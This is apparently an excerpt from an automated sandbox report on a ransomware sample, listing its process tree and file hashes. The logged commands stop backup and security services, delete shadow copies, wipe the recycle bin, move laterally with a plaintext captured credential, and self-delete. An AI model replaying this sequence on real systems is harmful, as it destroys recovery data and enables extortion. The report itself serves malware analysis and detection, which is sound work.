C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:4740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:5160
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵PID:4800
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:5220
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵PID:4836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:5324
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵PID:4872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:5348
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵PID:4948
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:5460
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵PID:5036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:5516
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:2372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:5684
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:4276
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:5696
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵PID:4656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:5760
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵PID:4888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:5748
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:4748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:5788
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:5148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:5824
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:5208
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:5856
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:5260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:5904
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:5336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:5952
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:5408
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:5964
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵PID:5484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:5992
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵PID:5544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:6008
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:5864
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:5384
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:2452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:5952
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:5732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:5964
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:5676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:4744
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:5624
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:5884
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:5348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:4812
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:5464
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:4880
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:4148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:4800
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:5148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:5604
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:5968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:5716
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:5164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:5408
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵PID:4468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:4928
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:5644
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:5900
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:5252
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:4608
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
PID:4872 -
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
PID:5036 -
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
PID:5296 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:4276 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:5196 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:5140 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:4828 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:6028 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:4020 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:4416 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:3016 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:780 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:4904 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:5608 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:2108 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5824 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:4356 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:196
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.53 /USER:SHJPOLICE\amer !Omar20122⤵PID:5852
-
C:\Users\Admin\AppData\Local\Temp\c3eokz5t.exe"C:\Users\Admin\AppData\Local\Temp\c3eokz5t.exe" \10.10.0.53 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe2⤵
- Executes dropped EXE
PID:4404 -
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:4692
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta2⤵
- Blocklisted process makes network request
PID:4436 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:1260
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:5060 -
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:6100
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe2⤵PID:1540
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:4524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:408
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:4428
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
78b0f852e77263420ec0b337836cbfa1
SHA172fc942fe2ace153a516e9d5605a81015e63e45d
SHA256ea07953a673620666e39dcd258c2e11978e663d7c575eb392957e887027bd0c1
SHA5122f5653bd2a2794cd8a2ee97d6964464db2c7b9fd2f3ec3d7fea36685c33a62d185762e1b84298f622e3ebcde53608581205f30a8ad8a5b304b1d3b7d7ef59b31
-
MD5
2a694ac72df5fb8dafec4837fda13db7
SHA1c29e7536d91425adc54f42d23b45e6b0766c2ede
SHA25640cab2e3216c87692d92013de4887364edc2ea4cf92b44ba82bab6d9f02a3756
SHA512885528f7f3711c998acd13bb6373c21ab399c7fa99f6f63b4070ca1313cf1088db0aea759344648a322ee6d23b912ec6fc8873447bd4e201690480f82d291ec2
-
MD5
2a694ac72df5fb8dafec4837fda13db7
SHA1c29e7536d91425adc54f42d23b45e6b0766c2ede
SHA25640cab2e3216c87692d92013de4887364edc2ea4cf92b44ba82bab6d9f02a3756
SHA512885528f7f3711c998acd13bb6373c21ab399c7fa99f6f63b4070ca1313cf1088db0aea759344648a322ee6d23b912ec6fc8873447bd4e201690480f82d291ec2
-
MD5
ec7b0b3d892c4f7d0382a031c094653f
SHA1a6ffd1ac5d895be20c21eb8f7becf2bd4bf99781
SHA256ff816e258056691ffa9a9aca2e9a6c0569c8bf5cad8860981624f0648d7ce6ea
SHA512f5eb1d6b405e583634b85dd16a6d52641317ed801b99dcd7bb3f4caf2a790fbd41cfc9eda801d056100c6d23887af0057a9f47a1444ac8bf2b571d7ebf79086b
-
MD5
f0c0e33cb8c314d9273b0671c8ef2a1e
SHA1e60be3364e7f3313d92deadfc4f77cfb8fc07094
SHA256d341a00e058975140d07946f2aa41c55a2f1ca0c7002ec8c8552e8991ac3eb3d
SHA5124176127fe50225587c2a4472facff18282ab8c7953a4089a4c25a11d367f66d274347fa1084311c2226e71378c3ac2a9039ced1a4471832792445ed29ccf32a8
-
MD5
f0c0e33cb8c314d9273b0671c8ef2a1e
SHA1e60be3364e7f3313d92deadfc4f77cfb8fc07094
SHA256d341a00e058975140d07946f2aa41c55a2f1ca0c7002ec8c8552e8991ac3eb3d
SHA5124176127fe50225587c2a4472facff18282ab8c7953a4089a4c25a11d367f66d274347fa1084311c2226e71378c3ac2a9039ced1a4471832792445ed29ccf32a8
-
MD5
f0c0e33cb8c314d9273b0671c8ef2a1e
SHA1e60be3364e7f3313d92deadfc4f77cfb8fc07094
SHA256d341a00e058975140d07946f2aa41c55a2f1ca0c7002ec8c8552e8991ac3eb3d
SHA5124176127fe50225587c2a4472facff18282ab8c7953a4089a4c25a11d367f66d274347fa1084311c2226e71378c3ac2a9039ced1a4471832792445ed29ccf32a8
-
MD5
14d33a7bdcf61d5d6d29e744daa969e7
SHA150de301bb0db9abc8cf830c8af9d54d13884dbc7
SHA256db6876ed6288f86294c98f2a6802e5229b49ed043f7764071533472e30c403f9
SHA5127f03211671e4823e222e696c9f3ca6301ebcdf35add5c93310178e9e35b306adf50f93208332b1f91bcb1f0eb8a4186597682db22090c7fbeb12491d15b46120
-
MD5
d844a33ea222cd63d3df2bd74ddf742b
SHA15d8b7e0a96c86430507ac41d821248d95edf4a52
SHA256297929e0b761983531a2cfaea05b0c08a7b384d14ef653d984203db920c49295
SHA512262c94ce0bb2449f9f254800aa27958ea2d25b6b4c2aab946460d6fdb647e207f3009a3773e1d6ee98c00b0fbf29893fd965d0e685f9f7a3429a39db4c3b635b
-
MD5
d844a33ea222cd63d3df2bd74ddf742b
SHA15d8b7e0a96c86430507ac41d821248d95edf4a52
SHA256297929e0b761983531a2cfaea05b0c08a7b384d14ef653d984203db920c49295
SHA512262c94ce0bb2449f9f254800aa27958ea2d25b6b4c2aab946460d6fdb647e207f3009a3773e1d6ee98c00b0fbf29893fd965d0e685f9f7a3429a39db4c3b635b
-
MD5
9b5a481f11ce24973ed9532b1bbcc394
SHA1973732339705552f1af4dc6d8f09feed902f3b65
SHA2563ca19e516fda9f9c04097921d27a5856fae0538ca1ebf11efc4c7b2c44208113
SHA512683395ba58ed0d28a2a2f6ab8f24783d9be0d78c3106bd4e6e512e355aa2efaac28ce8c7adbdffa726199e3c6b4aa47e453552bd8a8139bb3a6c58eb2491e045
-
MD5
ec42421720f415adecf3c598c4287a10
SHA19c0ce8ee98768b6272642997bc862b772d0cd18b
SHA256be7d6217b57989fa13fa3c523b695e9d52066171c49a0ace27106aecddf50e99
SHA51249b4dfe123cf767f207cbbe6c9d27797424b64840a650a2841420ca899b9fb39ea31fec7bfa96b0588e3b4b76ae2383773fada18f9d12410785d867a7d6ccbc4
-
MD5
a8283f82f258a5577fe39fe24650a880
SHA11fb0e4efaf0ee0dabc525ff37059a76486311642
SHA2561398d653106a68e31dbb1da06141a1809a65e92a45f021edf6be220265957225
SHA5126ce8f9f0c9cf8b611528947d8d81f5c870d6f5ecc2a7dab33af782aa092c530ff97736f5122b3b2e802fd5f19880f05597e83965bca3e64bbaad0f96e9da80ff
-
MD5
a8283f82f258a5577fe39fe24650a880
SHA11fb0e4efaf0ee0dabc525ff37059a76486311642
SHA2561398d653106a68e31dbb1da06141a1809a65e92a45f021edf6be220265957225
SHA5126ce8f9f0c9cf8b611528947d8d81f5c870d6f5ecc2a7dab33af782aa092c530ff97736f5122b3b2e802fd5f19880f05597e83965bca3e64bbaad0f96e9da80ff
-
MD5
85a366844a7a429001660821c6808956
SHA11f3764bc3ea18130a0abea6c18a8d6fc120a4908
SHA25611514502268414441de6f91983452014c683aca6b4c3a24b29777a81b59f854a
SHA51256644b06bc6abdc95b5b560004893ffd6807025198f6e1e7b0cd3fa02374189a0e85a4e4836b422cd674613c346d37b00fbfbcaf252a2bd82fcaac04151dd656